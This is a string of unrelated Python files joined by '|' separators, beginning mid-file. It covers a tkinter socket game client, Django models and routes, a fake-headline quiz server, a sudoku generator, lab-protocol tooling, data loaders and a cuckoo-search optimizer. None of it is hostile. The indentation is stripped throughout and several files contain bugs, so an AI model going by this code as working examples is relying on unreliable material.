button7.place(relx=0.5, rely=0.35, relwidth=0.23, relheight=0.3)
button8 = tk.Button(main_frame, text="Section" + str(part.sections[7].number),
command=lambda: select_room(part.sections[7]))
button8.place(relx=0.73, rely=0.35, relwidth=0.23, relheight=0.3)
if len(part.sections) > 8:
button9 = tk.Button(main_frame, text="Section" + str(part.sections[8].number),
command=lambda: select_room(part.sections[8]))
button9.place(relx=0.04, rely=0.65, relwidth=0.23, relheight=0.3)
back_button = tk.Button(main_frame, text="戻る", command=back)
back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
def part_section_window(section):
def select_room(part_section):
main_frame.destroy()
client.enter(part_section)
print(part_section.part_name)
room_select_window(part_section)
def back():
section_window(client.leave())
main_frame = tk.Frame(root)
main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
label1 = tk.Label(main_frame, text="品詞を選択してください")
label1.pack()
button1 = tk.Button(main_frame, text=section.word_parts[0].part_name,
command=lambda: select_room(section.word_parts[0]))
button1.place(relx=0.04, rely=0.05, relwidth=0.23, relheight=0.45)
button2 = tk.Button(main_frame, text=section.word_parts[1].part_name,
command=lambda: select_room(section.word_parts[1]))
button2.place(relx=0.27, rely=0.05, relwidth=0.23, relheight=0.45)
button3 = tk.Button(main_frame, text=section.word_parts[2].part_name,
command=lambda: select_room(section.word_parts[2]))
button3.place(relx=0.5, rely=0.05, relwidth=0.23, relheight=0.45)
button4 = tk.Button(main_frame, text=section.word_parts[3].part_name,
command=lambda: select_room(section.word_parts[3]))
button4.place(relx=0.73, rely=0.05, relwidth=0.23, relheight=0.45)
if len(section.word_parts) > 4:
button5 = tk.Button(main_frame, text=section.word_parts[4].part_name,
command=lambda: select_room(section.word_parts[4]))
button5.place(relx=0.04, rely=0.5, relwidth=0.23, relheight=0.45)
back_button = tk.Button(main_frame, text="戻る", command=back)
back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
def room_select_window(part_section):
def create_room():
main_frame.destroy()
create_room_window()
def join_room():
send_message("request_room")
for i in room_listbox.curselection():
msg = room_listbox.get(i)
join_room_info = re.findall("(?<=ルーム名:).*(?=, 制限人数:)|(?<=制限人数:).*(?=, ルームID:)|(?<=ルームID:).*$", msg)
join_room_info.append("j")
send_object(join_room_info)
main_frame.destroy()
play_window("j")
def back():
part_section_window(client.leave())
send_message("request_RoomList")
# クライアント情報をサーバに送信
send_object(client)
# ルームリストを受信
room_list = receive_object()
main_frame = tk.Frame(root)
main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
label1 = tk.Label(main_frame, text="ルームリスト")
label2 = tk.Label(main_frame, text="※左のリストからルームを選択してから参加ボタンを押してください。", font=("", 6))
label1.place(relx=0.05, rely=0.01)
label2.place(relx=0.66, rely=0.7)
room_list_frame = tk.Frame(main_frame)
room_list_frame.place(relx=0.05, rely=0.05, relwidth=0.51, relheight=0.9)
room_listbox = tk.Listbox(room_list_frame)
for room in room_list:
if room["reception"] is True:
room_listbox.insert(0,
"ルーム名:" + room["name"] + ", 制限人数:" + room["player_num"] + ", ルームID:" + room["id"])
room_listbox.place(relx=0, rely=0, relwidth=1, relheight=1)
scroll_bar = tk.Scrollbar(room_list_frame, command=room_listbox.yview)
scroll_bar.pack(side=tk.RIGHT, fill=tk.Y)
room_listbox.config(yscrollcommand=scroll_bar.set)
create_room_button = tk.Button(main_frame, text="ルーム作成", command=create_room)
join_room_button = tk.Button(main_frame, text="参加する", command=join_room)
back_button = tk.Button(main_frame, text="戻る", command=back)
create_room_button.place(relx=0.66, rely=0.3, relwidth=0.24, relheight=0.1)
join_room_button.place(relx=0.66, rely=0.6, relwidth=0.24, relheight=0.1)
back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
def create_room_window():
def create_room():
room_name = room_name_form.get()
room_max = room_maxnum_form.get()
if room_name == "":
room_name = "AnonymousRoom" + str(random.randint(0, 100001))
if room_max == "":
room_max = "4"
if int(room_max) > 4:
room_max = "4"
create_room_info = (room_name, room_max, "c")
send_message("request_room")
send_object(create_room_info)
main_frame.destroy()
play_window("c")
main_frame = tk.Frame(root)
main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
label1 = tk.Label(main_frame, text="Room Name")
label2 = tk.Label(main_frame, text="制限人数")
label1.place(relx=0.4, rely=0.25)
label2.place(relx=0.4, rely=0.45)
room_name_form = tk.Entry(main_frame)
room_maxnum_form = tk.Entry(main_frame)
room_name_form.place(relx=0.4, rely=0.3, relwidth=0.2, relheight=0.05)
room_maxnum_form.place(relx=0.4, rely=0.5, relwidth=0.2, relheight=0.05)
create_button = tk.Button(main_frame, text="作成", command=create_room)
create_button.place(relx=0.45, rely=0.6, relwidth=0.1, relheight=0.08)
def play_window(permission):
def send_btn():
send_message("answer")
send_message(msg_form.get())
msg_form.delete(0, tk.END)
def back_btn():
if permission == "c":
send_message("c_leave_room")
else:
send_message("j_leave_room")
main_frame.destroy()
room_select_window(client.position[2])
def send_entry(event):
send_message("answer")
send_message(msg_form.get())
msg_form.delete(0, tk.END)
def display_msg():
index = 0
while reception is True:
msg = receive_message()
print(msg)
if msg == "correct_answer":
display_word(index)
index += 1
sleep(0.25)
display_score()
sleep(0.25)
print("getScoreList")
elif msg == "leave_room":
break
elif msg == "game_finish":
display_score()
sleep(0.25)
end_frame = tk.Frame(main_frame)
end_frame.place(relx=0, rely=0.1, relwidth=0.8, relheight=0.9)
end_msg = tk.Label(end_frame, text="ゲームが終了しました。戻るボタンを押してルームリストに戻ってください。")
end_msg.place(relx=0.3, rely=0.4)
elif msg == "room_deleted":
deleted_label = tk.Label(main_frame, text="この部屋は作成者によって削除されました。戻るボタンから退出してください。")
deleted_label.place(relx=0.3, rely=0.3)
message_list_frame.destroy()
msg_form.destroy()
send_button.destroy()
else:
message_list.insert(0, msg)
sleep(0.25)
def display_word(index):
word_frame = tk.Frame(main_frame)
word_frame.place(relx=0, rely=0, relwidth=0.8, relheight=1)
word = words[index]
word_label = tk.Label(word_frame, text=word.japanese, font=("", int(300 / len(word.japanese))))
word_label.pack(expand=1, fill=tk.BOTH)
def display_score():
score = receive_object()
score_list = ""
rank = 1
for k, v in score.items():
score_list += str(rank) + "位:" + k + "," + str(v) + "p ; "
rank += 1
score_label = tk.Label(main_frame, text=score_list)
score_label.place(relx=0, rely=0)
main_frame = tk.Frame(root)
main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
# メッセージリスト(frame, listbox, scrollbar)の設定
message_list_frame = tk.Frame(main_frame)
message_list_frame.place(relx=0.8, rely=0, relwidth=0.2, relheight=0.9)
message_list = tk.Listbox(message_list_frame)
message_list.place(relx=0, rely=0, relwidth=1, relheight=1)
scroll_bar = tk.Scrollbar(message_list_frame, command=message_list.yview)
scroll_bar.pack(side=tk.RIGHT, fill=tk.Y)
message_list.config(yscrollcommand=scroll_bar.set)
# 単語リストを受信
send_message("request_words")
words = receive_object()
print("receive words")
# メッセージ入力欄の設定
msg_form = tk.Entry(main_frame, width=30)
msg_form.place(relx=0.8, rely=0.9, relwidth=0.15, relheight=0.05)
msg_form.bind("<Return>", send_entry)
# sendボタンの設定
send_button = tk.Button(main_frame, text="send", command=lambda: send_btn())
send_button.place(relx=0.95, rely=0.9, relwidth=0.05, relheight=0.05)
back_button = tk.Button(main_frame, text="戻る", command=lambda: back_btn())
back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
if permission is "c":
label1 = tk.Label(main_frame, text="ゲームを開始する場合は「Start」を押してください。", font=("", 20))
label1.place(relx=0, rely=0)
button2 = tk.Button(main_frame, text="Start", command=lambda: send_message("game_start"))
button2.place(relx=0.3, rely=0.4, relwidth=0.3, relheight=0.2)
if permission is "j":
label1 = tk.Label(main_frame, text="部屋作成者によってゲームが開始されるまで待機してください。", font=("", 15))
label1.place(relx=0, rely=0)
# メッセージ受信用のスレッドを起動
p = threading.Thread(target=display_msg)
p.start()
def on_closing():
if messagebox.askokcancel("Quit", "Do you want to quit?"):
msg = "-10"
send_message(msg)
root.destroy()
# ----------------------------------------------------------------------------------------------------------- #
# Main
# create a socket object
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# get local machine name
host = socket.gethostname()
port = 9999
print('start client')
# connection to hostname on the port.
soc.connect((host, port))
client = Client()
rooms = receive_object()
reception = True
root = tk.Tk()
root.title("Room")
root.geometry("800x500")
root.protocol("WM_DELETE_WINDOW", on_closing)
start_window()
root.mainloop()
reception = False
soc.close()
print("disconnection")
|
from django.db import models
from django.contrib.gis.db import models as geomodels
from django.contrib.auth.models import User
from django.conf.__init__ import settings
class UserProfile(User):
''' User profile
Represents a user that has account in the system
'''
class Meta:
verbose_name = 'user profile'
verbose_name_plural = 'user profiles'
country = models.CharField(max_length=255, null=False, blank=False, help_text="")
city = models.CharField(max_length=255, null=False, blank=False, help_text="")
zipcode = models.CharField(max_length=20, null=False, blank=False, verbose_name="Zip code", help_text="")
address = models.CharField(max_length=1024, null=False, blank=False, help_text="")
birth_date = models.DateField(help_text="format: dd/mm/yyyy")
mobile_number = models.CharField(max_length=30, help_text="")
location = geomodels.PointField(srid=settings.SPHERICAL_MERCATOR, help_text="")
objects = geomodels.GeoManager()
def __unicode__(self):
return "%s %s" % (self.first_name, self.last_name)
def __repr__(self):
return "<UserProfile: %s %s>" % (self.first_name, self.last_name) |
import scraper
import markov
from flask import Flask
from flask import jsonify
from flask_cors import CORS
import numpy as np
app = Flask(__name__)
CORS(app)
def list_to_json(headlines):
return {
'headlines': [{ 'content': item, 'real': True } for item in headlines]
}
headlines = scraper.get_headlines()
m_gen = markov.Markov(headlines)
json = list_to_json(headlines)
m_gen.add_fakes(json)
index = 0
@app.route('/')
def all_headlines():
np.random.shuffle(json['headlines'])
smaller_json = dict(json)
smaller_json['headlines'] = smaller_json['headlines'][:10]
return jsonify(smaller_json)
app.run('0.0.0.0') |
import random
def MakeSudoku():
Grid = [[0 for x in range(9)] for y in range(9)]
for i in range(9):
for j in range(9):
Grid[i][j] = 0
# The range here is the amount
# of numbers in the grid
for i in range(25):
#choose random numbers
row = random.randrange(9)
col = random.randrange(9)
num = random.randrange(1,10)
while(not CheckValid(Grid,row,col,num) or Grid[row][col] != 0): #if taken or not valid reroll
row = random.randrange(9)
col = random.randrange(9)
num = random.randrange(1,10)
Grid[row][col]= num;
Printgrid(Grid)
def Printgrid(Grid):
TableTB = "|--------------------------------|"
TableMD = "|----------+----------+----------|"
print(TableTB)
for x in range(9):
for y in range(9):
if ((x == 3 or x == 6) and y == 0):
print(TableMD)
if (y == 0 or y == 3 or y== 6):
print("|", end=" ")
print(" " + str(Grid[x][y]), end=" ")
if (y == 8):
print("|")
print(TableTB)
# |-----------------------------|
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# |---------+---------+---------|
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# |---------+---------+---------|
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# | 0 0 0 | 0 0 0 | 0 0 0 |
# |-----------------------------|
def CheckValid(Grid,row,col,num):
#check if in row
valid = True
#check row and collumn
for x in range(9):
if (Grid[x][col] == num):
valid = False
for y in range(9):
if (Grid[row][y] == num):
valid = False
rowsection = row // 3
colsection = col // 3
for x in range(3):
for y in range(3):
#check if section is valid
if(Grid[rowsection*3 + x][colsection*3 + y] == num):
valid = False
return valid
MakeSudoku()
|
import json
import logging
import os
from abc import ABC
import tyto
import labop
import uml
from labop.primitive_execution import input_parameter_map
l = logging.getLogger(__file__)
l.setLevel(logging.WARN)
container_ontology_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"../labop/container-ontology.ttl",
)
ContO = tyto.Ontology(
path=container_ontology_path,
uri="https://sift.net/container-ontology/container-ontology",
)
class BehaviorSpecializationException(Exception):
pass
class ContainerAPIException(Exception):
pass
class BehaviorSpecialization(ABC):
"""
This abstract class defines an API for different conversions from LabOP
to other formats, such as Markdown or Autoprotocol.
"""
def __init__(self) -> None:
super().__init__()
self._behavior_func_map = self._init_behavior_func_map()
self.top_protocol = None
self.execution = None
self.issues = []
self.out_dir = None
self.objects = {}
# This data field holds the results of the specialization
self.data = []
def initialize_protocol(self, execution: labop.ProtocolExecution, out_dir=None):
self.execution = execution
self.out_dir = out_dir
def _init_behavior_func_map(self) -> dict:
return {}
def on_begin(self, execution: labop.ProtocolExecution):
self.data = []
def on_end(self, execution: labop.ProtocolExecution):
try:
dot_graph = execution.to_dot()
self.data.append(str(dot_graph.source))
except Exception as e:
msg = "Could not render dot graph for execution in DefaultBehaviorSpecialization"
l.warn(msg)
self.issues.append(msg)
self.data = json.dumps(self.data)
if self.out_dir:
with open(
os.path.join(self.out_dir, f"{self.__class__.__name__}.json"),
"w",
) as f:
f.write(self.data)
def process(self, record, execution: labop.ProtocolExecution):
try:
node = record.node.lookup()
if not isinstance(node, uml.CallBehaviorAction):
return # raise BehaviorSpecializationException(f"Cannot handle node type: {type(node)}")
# Subprotocol specializations
behavior = node.behavior.lookup()
if isinstance(behavior, labop.Protocol):
return self._behavior_func_map[behavior.type_uri](record, execution)
# Individual Primitive specializations
elif str(node.behavior) not in self._behavior_func_map:
l.warning(f"Failed to find handler for behavior: {node.behavior}")
return self.handle(record, execution)
return self._behavior_func_map[str(node.behavior)](record, execution)
except Exception as e:
# l.warn(
# f"{self.__class__} Could not process() ActivityNodeException: {record}: {e}"
# )
l.warn(
f"{self.__class__} Could not process {node.behavior.split('#')[-1]}: {e}"
)
self.handle_process_failure(record, e)
def handle_process_failure(self, record, e):
self.issues.append(e)
raise e
def handle(self, record, execution):
# Save basic information about the execution record
node = record.node.lookup()
params = input_parameter_map(
[
pv
for pv in record.call.lookup().parameter_values
if pv.parameter.lookup().property_value.direction == uml.PARAMETER_IN
]
)
params = {p: str(v) for p, v in params.items()}
node_data = {
"identity": node.identity,
"behavior": node.behavior,
"parameters": params,
}
self.update_objects(record)
self.data.append(node_data)
def update_objects(self, record: labop.ActivityNodeExecution):
"""
Update the objects processed by the record.
Parameters
----------
record : labop.ActivityNodeExecution
A step that modifies objects.
"""
pass
def resolve_container_spec(self, spec, addl_conditions=None):
# Attempt to infer container instances using the remote container ontology
# server, otherwise use tyto to look it up from a local copy of the ontology
try:
from container_api import matching_containers
except:
l.warning("Could not import container_api, is it installed?")
else:
try:
if addl_conditions:
possible_container_types = matching_containers(
spec, addl_conditions=addl_conditions
)
else:
possible_container_types = matching_containers(spec)
return possible_container_types
except Exception as e:
l.warning(e)
# This fallback only works when the spec query is a simple container class/instance formatted in Manchester owl as cont:<container_uri>. Other container constraints / query criteria are not supported
l.warning(
f"Cannot resolve container specification using remote ontology server. Defaulting to static ontology copy"
)
container_uri = validate_spec_query(spec.queryString)
if container_uri.is_instance():
possible_container_types = [container_uri]
else:
possible_container_types = container_uri.get_instances()
return possible_container_types
def get_container_typename(self, container_uri: str) -> str:
# Returns human-readable typename for a container, e.g., '96 well plate'
return ContO.get_term_by_uri(container_uri)
def check_lims_inventory(self, matching_containers: list) -> str:
# Override this method to interface with laboratory lims system
return matching_containers[0]
class DefaultBehaviorSpecialization(BehaviorSpecialization):
def _init_behavior_func_map(self) -> dict:
return {
"https://bioprotocols.org/labop/primitives/sample_arrays/EmptyContainer": self.handle,
"https://bioprotocols.org/labop/primitives/liquid_handling/Provision": self.handle,
"https://bioprotocols.org/labop/primitives/sample_arrays/PlateCoordinates": self.handle,
"https://bioprotocols.org/labop/primitives/spectrophotometry/MeasureAbsorbance": self.handle,
"https://bioprotocols.org/labop/primitives/liquid_handling/TransferByMap": self.handle,
"http://bioprotocols.org/labop#Protocol": self.handle,
}
def validate_spec_query(query: str) -> "tyto.URI":
if type(query) is tyto.URI:
return query
if "#" in query:
# Query is assumed to be a URI
tokens = query.split("#")
if len(tokens) > 2 or tokens[0] != ContO.uri:
raise ValueError(
f"Cannot resolve container specification '{query}'. The query is not a valid URI"
)
return tyto.URI(query, ContO)
# Query is assumed to be a qname
if ":" in query:
tokens = query.split(":")
if (
len(tokens) > 2 or tokens[0] != "cont"
): # TODO: use prefixMap instead of assuming the prefix is `cont`
raise ValueError(
f"Cannot resolve container specification '{query}'. Is the query malformed?"
)
return tyto.URI(query.replace("cont:", ContO.uri + "#"), ContO)
raise ValueError(
f"Cannot resolve container specification '{query}'. Is the query malformed?"
)
|
from ui.TextOutput import TextOutput
# Will serve as a proxy between output and output libraries
# For now, it just links to the TextOutput library.
class UI:
def __init__(self):
return
def show_text(self, text):
TextOutput().show(text)
def show_line(self, text):
TextOutput().line(text)
def show_options(self, options):
TextOutput().options(options)
def list_targets(self, targets):
TextOutput().targets(targets) |
# -*- coding: utf-8 -*-
from cachetools import cached
from dateutil import parser
import pandas as pd
import quandl
from omaha.joinable import Joinable
class Company(Joinable):
"""Container for the financial indicators of the public company
Attributes:
ticker (str): Ticker symbol
from_q (str): Beginning quarter of the target range
to_q (str): End quarter of the target range
client (Client): BuffettCode API Client
"""
def __init__(self, ticker, from_q, to_q, client):
self.ticker = ticker
self.client = client
self.from_q = from_q
self.to_q = to_q
super().__init__([self])
@classmethod
def dict_pairs(cls, d, keys):
return {k: v for k, v in d.items() if k in keys}
@cached(cache={})
def __get(self, from_q, to_q):
return self.client.quarter(self.ticker, from_q, to_q)
def __str__(self):
return f"Company({self.ticker}, {self.from_q}, {self.to_q})"
def __repr__(self):
return self.__str__()
def get(self, item):
res = self.__get(self.from_q, self.to_q)
keys = [item, "fiscal_year", "fiscal_quarter"]
return [Company.dict_pairs(d, keys) for d in res[self.ticker]]
def all(self):
res = self.__get(self.from_q, self.to_q)
return res[self.ticker]
def raw_df(self):
res = self.__get(self.from_q, self.to_q)
df = pd.DataFrame(res[self.ticker])
index = [pd.Timestamp(s, tz="UTC") for s in df["end_date"]]
df.index = index
return df
class Stockprice(Joinable):
"""Container for the daily stockprice of the public company.
"""
def __init__(self, ticker, start_date, end_date):
self.ticker = ticker
self.start_date = start_date
self.end_date = end_date
super().__init__([self])
def raw_df(self):
df = quandl.get(
f"XJPX/{self.ticker}0", start_date=self.start_date, end_date=self.end_date
)
df.index = [pd.Timestamp(s, tz="UTC") for s in df.index]
return df
|
from django.db import models
from django.contrib.auth.models import User
class Post(models.Model):
title = models.CharField(max_length=50) # mysql VARCHAR(50)
body = models.TextField() # mysql text
date = models.DateTimeField(auto_now_add=True)
img = models.ImageField(default='default.png', blank=True)
author = models.ForeignKey(User, default=None, on_delete=models.DO_NOTHING)
# pip install pillow
# python manage.py makemigrations blog
# python manage.py migrate
# python manage.py runserver
def __str__(self):
return self.title
def bogino(self):
return self.body[:50] + '...' |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
def max_in_list(list):
"""Una funcion para encontrar el numero maximo de una lista de enteros"""
max=list[0]
for att in list[1:]:
if att>max:
max=att
return max
def parse_listOfStrings_to_listOfIntegers(list):
"""Una funcion para convertir una lista de string en una lista de enteros"""
result=[]
error=""
try:
for item in list[:]:
result.append(int(item))
return result
except ValueError as e:
print("La lista debe contener unicamente enteros positivos y negativos")
print(e)
return []
message="Proporcione la lista de la cual se busca encontrar el numero maximo, debe estar en el formato: number1,number2,number3...numberN; ejemplo: 23,5456,123,4653,-123 - "
listAsString=input(message)
if len(listAsString)>0:
listOfStrings=listAsString.split(',')
list=parse_listOfStrings_to_listOfIntegers(listOfStrings)
if len(list)>0:
print("El numero maximo es: ",max_in_list(list))
else:
print("No se ha proporcionado una lista")
|
from django.urls import path
from . import views
app_name = "tasks"
urlpatterns = [
path("tasks/", views.IndexView.as_view(), name="index"),
path("events/", views.EventView.as_view(), name="event_index"),
path("schedule/", views.ScheduleView.as_view(), name="schedule"),
path("task/<int:pk>/", views.TaskDetail.as_view(), name="task_detail"),
path("new_task/", views.TaskCreate.as_view(), name="create_task"),
path("task/<int:pk>/edit/", views.TaskUpdate.as_view(), name="edit_task"),
path("task/<int:pk>/delete/", views.TaskDelete.as_view(), name="delete_task"),
path("task/<int:task_id>/mark_done/", views.mark_task_done, name="mark_as_done"),
path("task/<int:task_id>/mark_todo/", views.mark_task_todo, name="mark_as_todo"),
path(
"task/<int:task_id>/change_time_spent/",
views.change_time_spent,
name="change_time_spent",
),
path("event/<int:pk>/", views.EventDetail.as_view(), name="event_detail"),
path("new_event/", views.EventCreate.as_view(), name="create_event"),
path("event/<int:pk>/edit/", views.EventUpdate.as_view(), name="edit_event"),
path("event/<int:pk>/delete/", views.EventDelete.as_view(), name="delete_event"),
path("routine/<int:pk>/", views.RoutineDetail.as_view(), name="routine_detail"),
path("new_routine/", views.RoutineCreate.as_view(), name="create_routine"),
path("routine/<int:pk>/edit/", views.RoutineUpdate.as_view(), name="edit_routine"),
path(
"routine/<int:pk>/delete/", views.RoutineDelete.as_view(), name="delete_routine"
),
path("stats/", views.StatisticsView.as_view(), name="user_statistics"),
]
|
from .dataset import StandardDataset
from .sampler import SetSampler
import pickle
import torch
import config.paths_catalog as paths_catalog
import pandas as pd
D = {
'StandardDataset': StandardDataset
}
def build_dataset(cfg, name, dataset_catalog, ratio=None, is_train=True, is_valid=False):
"""
Arguments:
name (str): name of the dataset
dataset_catalog (DatasetCatalog): contains the information on how to construct a dataset.
ratio (float): train/test ratio
is_train (bool): whether to setup the dataset for training or testing
"""
assert (is_train and is_valid) == False
data_config = dataset_catalog.get(cfg, name, ratio)
factory = D[data_config['factory']]
# load the dataset
data = pd.read_csv(data_config['path'], header=None)
x, y = data.iloc[:, :-1].values, data.iloc[:, -1].values
if is_train:
index_train = pd.read_csv(data_config['index_train'])
index_train = index_train.values.reshape(-1)
x, y = x[index_train], y[index_train]
elif is_valid:
index_valid = pd.read_csv(data_config['index_valid'])
index_valid = index_valid.values.reshape(-1)
x, y = x[index_valid], y[index_valid]
else:
index_test = pd.read_csv(data_config['index_test'])
index_test = index_test.values.reshape(-1)
x, y = x[index_test], y[index_test]
dataset = factory(cfg, x, y)
return dataset
def load_dataset(cfg, train=True, valid=False):
assert (train and valid) == False
DatasetCatalog = paths_catalog.DatasetCatalog
if train:
data_config = DatasetCatalog.get(cfg, cfg.DATASET.TRAIN, cfg.DATASET.RATIO)
# load the dataset
data = pd.read_csv(data_config['path'], header=None)
x, y = data.iloc[:, :-1].values, data.iloc[:, -1].values
index_train = pd.read_csv(data_config['index_train'])
index_train = index_train.values.reshape(-1)
x, y = x[index_train], y[index_train]
elif valid:
data_config = DatasetCatalog.get(cfg, cfg.DATASET.VALID, cfg.DATASET.RATIO)
# load the dataset
data = pd.read_csv(data_config['path'], header=None)
x, y = data.iloc[:, :-1].values, data.iloc[:, -1].values
index_valid = pd.read_csv(data_config['index_valid'])
index_valid = index_valid.values.reshape(-1)
x, y = x[index_valid], y[index_valid]
else:
data_config = DatasetCatalog.get(cfg, cfg.DATASET.TEST, cfg.DATASET.RATIO)
# load the dataset
data = pd.read_csv(data_config['path'], header=None)
x, y = data.iloc[:, :-1].values, data.iloc[:, -1].values
index_test = pd.read_csv(data_config['index_test'])
index_test = index_test.values.reshape(-1)
x, y = x[index_test], y[index_test]
return x, y
def make_data_sampler(dataset, shuffle):
if shuffle:
return None # we utilize customized batch sampler to maintain the imbalance ratio, which is mutually exclusive with sampler
else:
return torch.utils.data.sampler.SequentialSampler(dataset)
def make_batch_sampler(cfg, dataset, is_train=True):
if is_train:
# utilize set sampler
batch_sampler = SetSampler(dataset, cfg.DATALOADER.NUM_BATCH, cfg.DATALOADER.BATCH_SIZE)
else:
batch_sampler = None # use the default batch sampler
return batch_sampler
def make_data_loader(cfg, is_train=True, is_valid=False):
assert (is_train and is_valid) == False
if is_train:
shuffle = True
else:
shuffle = False
DatasetCatalog = paths_catalog.DatasetCatalog
if is_train:
dataset = build_dataset(cfg, cfg.DATASET.TRAIN, DatasetCatalog, ratio=cfg.DATASET.RATIO, is_train=is_train, is_valid=is_valid)
elif is_valid:
dataset = build_dataset(cfg, cfg.DATASET.VALID, DatasetCatalog, ratio=cfg.DATASET.RATIO, is_train=is_train, is_valid=is_valid)
else:
dataset = build_dataset(cfg, cfg.DATASET.TEST, DatasetCatalog, ratio=cfg.DATASET.RATIO, is_train=is_train, is_valid=is_valid)
# data sampler
data_sampler = make_data_sampler(dataset, shuffle=shuffle)
batch_sampler = make_batch_sampler(cfg, dataset, is_train=is_train)
data_loader = torch.utils.data.DataLoader(
dataset,
num_workers=cfg.DATALOADER.NUM_WORKERS,
sampler=data_sampler,
batch_sampler=batch_sampler
)
return data_loader
|
import matplotlib.pyplot as plt
import numpy as np
import math
#INITIALIZATION
population_size = 50
max_generation = 122
_lambda = 1.5
dimension = 2
max_domain = 500
min_domain = -500
step_size_cons = 0.01
Pa = 0.25
#OBJECTIVE FUNCTION
def schwefel(array):
sum = 0
for x in array:
sum = sum + x * np.sin(np.sqrt(np.abs(x)))
fitness = 418.9829 * len(array) - sum
return fitness
#LEVY FLIGHT
def levy_flight(Lambda):
sigma1 = np.power((math.gamma(1 + Lambda) * np.sin((np.pi * Lambda) / 2)) \
/ math.gamma((1 + Lambda) / 2) * np.power(2, (Lambda - 1) / 2), 1 / Lambda)
sigma2 = 1
u = np.random.normal(0, sigma1, size=dimension)
v = np.random.normal(0, sigma2, size=dimension)
step = u / np.power(np.fabs(v), 1 / Lambda)
return step
class Indivisual:
def __init__(self):
self.__position = np.random.rand(dimension) * (max_domain - min_domain) + min_domain
self.__fitness = schwefel(self.__position)
def get_position(self):
return self.__position
def get_fitness(self):
return self.__fitness
def set_position(self, position):
self.__position = position
def set_fitness(self, fitness):
self.__fitness = fitness
def abandon(self):
# abandon some variables
for i in range(len(self.__position)):
p = np.random.rand()
if p < Pa:
self.__position[i] = np.random.rand() * (max_domain - min_domain) + min_domain
self.__fitness = schwefel(self.__position)
def main():
#RANDOMLY CREATING HOSTS
cs_list = []
for i in range(population_size):
cs_list.append(Indivisual())
#SORT TO GET THE BEST FITNESS
cs_list = sorted(cs_list, key=lambda ID: ID.get_fitness())
best_fitness = cs_list[0].get_fitness()
fig = plt.figure()
#INITIAL POPULATION DISTRIBUTION
ax1 = fig.add_subplot(131)
for i in range(population_size):
ax1.scatter([cs_list[i].get_position()[0]], [cs_list[i].get_position()[1]])
ax1.set_title('Initial Population Distributtion')
ax1.set_xlabel('x-axis')
ax1.set_ylabel('y-axis')
ax3 = fig.add_subplot(133)
t = 1
while(best_fitness > 0.009):
#GENERATING NEW SOLUTIONS
for i in range(population_size):
#CHOOSING A RANDOM CUCKOO (say i)
i = np.random.randint(low=0, high=population_size)
#SETTING ITS POSITION USING LEVY FLIGHT
position = cs_list[i].get_position()+(step_size_cons*levy_flight(_lambda))
# Simple Boundary Rule
for i in range(len(position)):
if position[i] > max_domain:
position[i] = max_domain
if position[i] < min_domain:
position[i] = min_domain
cs_list[i].set_position(position)
cs_list[i].set_fitness(schwefel(cs_list[i].get_position()))
#CHOOSING A RANDOM HOST (say j)
j = np.random.randint(0, population_size)
while j == i: # random id[say j] ≠ i
j = np.random.randint(0, population_size)
#RELAXATION
if cs_list[j].get_fitness() > cs_list[i].get_fitness():
cs_list[j].set_position(cs_list[i].get_position())
cs_list[j].set_fitness(cs_list[i].get_fitness())
#SORT (to Keep Best)
cs_list = sorted(cs_list, key=lambda ID: ID.get_fitness())
#ABANDON SOLUTION (exclude the best)
for a in range(1, population_size):
r = np.random.rand()
if (r < Pa):
cs_list[a].abandon()
#RANKING THE CS LIST
cs_list = sorted(cs_list, key=lambda ID: ID.get_fitness())
#FIND THE CURRENT BEST
if cs_list[0].get_fitness() < best_fitness:
best_fitness = cs_list[0].get_fitness()
#PRINTING SOLUTION IN EACH ITERATION
print("iteration =", t, " best_fitness =", best_fitness)
#FITNESS PLOTTING
ax3.scatter(t, best_fitness)
t += 1
#GRAPH FOR FITNESS
ax3.set_title('Fitness Curve')
ax3.set_xlabel('x-axis')
ax3.set_ylabel('y-axis')
# FINAL POPULATION DISTRIBUTION
ax2 = fig.add_subplot(132)
for i in range(population_size):
ax2.scatter([cs_list[i].get_position()[0]], [cs_list[i].get_position()[1]])
ax2.set_title('Final Population Distributtion after '+str(t)+' iterations')
ax2.set_xlabel('x-axis')
ax2.set_ylabel('y-axis')
#SHOWING GRAPH
plt.show()
if __name__ == "__main__":
main() |
def execute(infn):
f = open(infn, 'r')
programs = int(f.readline())
for _ in range(programs):
stack = []
instructions = int(f.readline())
for _ in range(instructions):
instr = f.readline()
if 'PUSH' == instr:
stack.append(frozenset())
if 'DUP' == instr:
stack.append(stack[-1])
if 'UNION' == instr:
first = stack.pop()
second = stack.pop()
stack.append(first | second)
if 'INTERSECT' == instr:
first = stack.pop()
second = stack.pop()
stack.append(first & second)
if 'ADD' == instr:
first = stack.pop()
second = set(stack.pop())
second.add(first)
stack.append(frozenset(second))
print stack
print len(stack[-1])
print '***'
|
import db
import json
def write_page_flag(Mission_Id):
page = db.get_page_flag(Mission_Id,1)
print(page)
file_name = '%s_page_flag'%Mission_Id
save_data(page,file_name)
def write_page_config(Mission_Id):
for i in range(10):
config = db.get_page_config(Mission_Id,i,1)
if len(config)==0:
print('No config in page %d'%i)
continue
file_name = '%s_page_config_page%s'%(Mission_Id,str(i))
save_data(config,file_name)
def save_data(content,filename):
# 保存
file_dir = r'..\config\%s.npy'%filename
# makedir_account(file_dir)
with open(file_dir,'w') as f:
for info in content:
item = json.dumps(info)
f.write(item)
f.write('\n')
def read_data(filename):
infos = []
file_dir = r'..\config\%s.npy'%filename
with open(file_dir,'r') as f:
lines = f.readlines()
for line in lines:
if line=='\n':
continue
info = json.loads(line)
infos.append(info)
